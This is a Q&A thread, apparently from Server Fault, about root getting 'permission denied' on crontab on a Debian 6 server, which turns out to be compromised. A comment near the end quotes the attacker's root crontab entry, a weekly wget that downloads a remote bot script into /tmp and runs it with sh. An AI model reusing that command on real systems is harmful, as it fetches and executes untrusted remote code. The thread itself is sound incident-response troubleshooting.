# root + crontab : permission denied

Tags: cron, root, permissions

I'm using Debian 6, all patched up, but when I try to access crontab as root, I just get a permission denied:

```
root@server:~# crontab -e
-bash: /usr/bin/crontab: Permission denied
```

Please note this isn't as a user, but as **root**.

I haven't even got the foggiest clue how to resolve this if root has no access to the crontab.

Any ideas?

---

edit: answers are correct in

a) yes there has been mischief (at least this is my suspicion)

b) that my permissions on the crontab were screwy:

```
root@server:~# ls -lha /usr/bin/crontab
---------- 1 root crontab 30K Dec 19  2010 /usr/bin/crontab
```

so trying the chmod answer:

```
root@server:~# chmod 2755 /usr/bin/crontab
chmod: changing permissions of '/usr/bin/crontab': Operation not permitted`
```

and the package reinstall:

```
root@server:~# apt-get install --reinstall cron
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 1 reinstalled, 0 to remove and 0 not upgraded.
Need to get 93.2 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 http://ftp.debian.org/debian/ squeeze/main cron i386 3.0pl1-116 [93.2 kB]
Fetched 93.2 kB in 0s (164 kB/s)
(Reading database ... 86601 files and directories currently installed.)
Preparing to replace cron 3.0pl1-116 (using .../cron_3.0pl1-116_i386.deb) ...
Stopping periodic command scheduler: cron.
Unpacking replacement cron ...
dpkg: error processing /var/cache/apt/archives/cron_3.0pl1-116_i386.deb (--unpack):
 unable to make backup link of `./usr/bin/crontab' before installing new version: Operation not permitted configured to not write apport reports
 chown: changing ownership of `root': Operation not permitted
 chmod: changing permissions of `root': Operation not permitted
Starting periodic command scheduler: cron.
Processing triggers for man-db ...
Errors were encountered while processing:
 /var/cache/apt/archives/cron_3.0pl1-116_i386.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
```

Is this going to take a complete reinstall of the system now to get this back up and running?

edit:
This is not a duplicate question - I had suspicions of a compromised server, but I'm not going to flatten a live server and rebuild it without evidence.

My original question was about the permission denied as a root user, as I was sure that was an impossibility, and I can assure you that I did search for that question first.

Thanks to the helpful folks here, I now understand the permissions more, and if this happens to someone else, they too will also be able to narrow down what has happened.

Comment: Your server has been compromised. See http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Answer (score 1, accepted):

OK, you already have part of an answer, having found the permissions on /usr/bin/crontab.

Now chmod is saying it can't modify those permissions.  Try `lsattr /usr/bin/crontab` to check if the file attributes have been messed with, and `chattr -i /usr/bin/crontab` to fix it if that is indeed the issue.

If this is foul play, then my guess is someone is trying to prevent you from finding and fixing something in the crontab data files.  Those are usually in /var/spool/cron/crontabs/ .  I wouldn't be surprised if there were more permissions or file attributes blocking your path, but you want to get in and audit those files smartish.  You might also want to look for other files that have their file attributes set oddly (in particular the immutable bit).

I'm sure it will be possible to get the system up and running again, but it's hard to say how much will be involved to do that, depending how much mischief has been made.  It's also likely that you would never know if you've really undone all the mischief.  A complete reinstall, or reinstatement of a backup is probably a good idea.

I note that on an up to date (such as that is these days, using LTS) debian 6 system I have handy, my /usr/bin/crontab is 35k, not 30k in size.  So consider the content of that file suspect, and don't run it.  Take a copy, then replace it from the distribution version.

Comment: Right, reinstall it is. Just for the record, the crontab shows the following:

s---ia-----------e- /usr/bin/crontab

and as for chattr:
chattr: command not found

Reinstall, all the way. Thanks for all your help!

Comment: and heres what was running:

`root@server:~# cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/c installed on Tue Oct 21 05:38:11 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >/dev/null 2>&1`

Comment: You were presumably going to need to move to a later OS version some time anyway.  However, if you follow through the downloaded link, and the bits it downloads, you'll find that init.c includes the code which has made the mischief we've been talking about.  It's fairly likely that you have a complete recipe for what was done to your system.  You don't however have info on how they compromised your system in the first place (at least as far as I know).  Note that /etc/init.d/ssh is compromised.  Also /etc/cron.weekly/logrotator.  You can just copy chattr in from another system if you want.

Comment: No, I have no clue how they got in. However, from my google fu about the stablehost bots, it looks like it was a recipient of the shell shock bug.

Comment: Make sure that `init`, `pb` and `b` are not running.  Ie not the `init` that comes as standard (PID = 1), but the one the hacker installed.

Answer (score 0):

Try `chmod 0755 /usr/bin/crontab` and then execute crontab binary again. Perhaps someone or something has changed the permissions for the executable itself.

**EDIT:** After your update it seems that your root file system has gone read-only for some reason. That is my guess, anyway. The reasons for that could be

- Your system has suffered some kind of hardware failure (failing HDD, bad HD cable, bad RAM, something that caused Linux kernel to think it's better to remount the file system read-only). See `dmesg` output if there are any clues to this.
- You actually have mounted root file system as read-only, see from `/etc/fstab` if `ro` flag is set there.
- Your system is some kind of live boot without actual installation. Though I'm sure you would be aware of this. :-)
- Your root filesystem has been corrupted due unclean shutdown / angry elves / position of the Saturn and needs to be fixed. Before attempting a thorough fsck, please make sure you have decent backups (which you should have anyway).

Comment: It's a VPS, so if there is a hardware fault, I have bigger problems :)
The filesystem is not readonly - I've been able to create, edit and delete files.
Definitely not a live boot!
I'll do the fsck now, but I'm sure this is because of hackers not wanting me to change the crontab and not a corrupt filesystem. (reasoning: there is a process starting at 6am that uses a stupid amount of bandwidth and cpu resources that I don't recognise)

Comment: @Fozzedout - you should reinstall the system as stated in the Canonical Q&A linked in a comment to your question.

Comment: Already done, and took the opportunity to switch to Debian 7. Thanks!

Answer (score 0):

Bash is telling you that you don't have execute permissions on the /usr/bin/crontab binary.

It should match the following permissions

```
# ls -la /usr/bin/crontab 
-rwxr-sr-x 1 root crontab 35880 Jul  4  2012 /usr/bin/crontab
```

You can probably fix this by running, as root

```
chmod 2755 /usr/bin/crontab
```

Or you could run the following to force a complete reinstall of cron

```
apt-get install --reinstall cron
```

Comment: Both answers do not mention that one should find out *why* the permissions were changed in the first place. Could be mischief or human error...

Comment: That's a fair comment.

Comment: Yeah, there was mischief, I am sure of it, which is why I'm trying to get into the crontab.

editing my question above